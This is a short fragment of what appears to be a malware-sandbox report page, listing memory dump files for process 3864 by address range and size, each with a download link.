Filesize
264KB

Download
memory/3864-226-0x00007FF9876B0000-0x00007FF987B1E000-memory.dmp

Filesize
4.4MB

Download
memory/3864-210-0x00007FF998140000-0x00007FF99814D000-memory.dmp

Filesize
52KB

Download
memory/3864-207-0x00007FF996A60000-0x00007FF996A94000-memory.dmp

Filesize
208KB

Download
memory/3864-625-0x00007FF997440000-0x00007FF99746D000-memory.dmp

Filesize
180KB

Download
memory/3864-627-0x00007FF9971C0000-0x00007FF9971EB000-memory.dmp

Filesize
172KB

Download
memory/3864-624-0x00007FF997470000-0x00007FF997489000-memory.dmp

Filesize
100KB

Download
memory/3864-618-0x00007FF9876B0000-0x00007FF987B1E000-memory.dmp

Filesize
4.4MB

Download